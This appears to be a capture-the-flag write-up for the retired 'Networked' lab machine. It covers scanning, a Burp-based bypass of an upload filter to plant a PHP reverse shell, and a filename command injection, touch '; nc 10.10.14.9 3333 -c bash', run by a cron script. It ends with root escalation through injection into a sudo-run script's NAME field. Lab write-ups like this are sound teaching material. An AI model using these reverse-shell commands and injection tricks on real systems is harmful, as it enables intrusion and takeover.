The Networked machine is a retired Linux operating system machine.
First, we try to recognize the target machine by performing network scanning.
Classic scan
Full TCP port scanning
Full UDP Port scanning
As a result of scaning
We see that SSH and http ports are open.
When the apache service runs from the http port, it goes through the browser.
We see that there is not much in the web address, there are clear txt texts.
We’re reviewing the source code.
upload and gallery not yet linked
We see a comment line here, which may have given us a clue.
Here we will perform the directory enumuration.
We will use the gobuster tool to perform the directory enumuration.
When we go to the directories it finds here, we see that there are files in the /backup directory.
We download the backup.tar file in this directory to our machine and check its content.
Since there are php files here, we provide the discovery in the directory section, considering that they can be found on the web server.
There are a few image examples on the Photos.php page, and when you look at the source code, it is understood that no situation has been encountered.
Looks like there’s something on the upload.php page 🙂
Here we tried to load the php shell file prepared by pentest monkey. https://github.com/pentestmonkey/php-reverse-shell When we tried to add the file, we couldn’t add the php files. We got the “Invalid image file” error.
Tried interception and bypass methods with Burp suite. (You can see detailed blog posts about how to intervene with burpsuite.)
With burpsuite in between
1. We changed the gif format of “Filename=”
2. Changed “Content-Type:“ to GIF
3. We added GIF file format per file
Forwarded after making arrangements
We go to the photos.php page and see the file we added.
When we look at the Shell screen that we have opened in the back, we have obtained reversheell.
Enumuration is provided on the system in order to raise any information that could not be authorized.
Here, what was requested from us was to find the security weakness on the source code side, and check_attack.php and crontab.guly files caught our attention. Here are the file definitions in the check_attack.php file
$path = ‘/var/www/html/uploads/’;
And $value is the name of the suspicious file.
We can go and create a file that holds the payload named . /var/www/html/uploadsAd will start with semicolon (to inject new command), then reverse shell command can be typed
We use the command “touch ‘; nc 10.10.14.9 3333 -c bash’ “to get the reverse shell.
We can connect with netcat that we open in the background.
We were able to obtain the user flag.
Then, we investigated how we can obtain privilege escalation by performing enumuration from the shell we obtained.
The binaries that we can run as root with the sudo -l command are listed
Here we came across the file /usr/local/sbin/changename.sh.
We read the contents of this file with the cat command.
This script creates a network script for an interface that is called guly, and then activates that interface. Prompts the user for the following options: NAME, PROXY_METHOD, BROWSER_ONLY, BOOTPROTO.
We are only interested in option because we can inject commands on this page based on NAME interface name. Let’s try running bash.
We can get root authority, we can get root flag from here.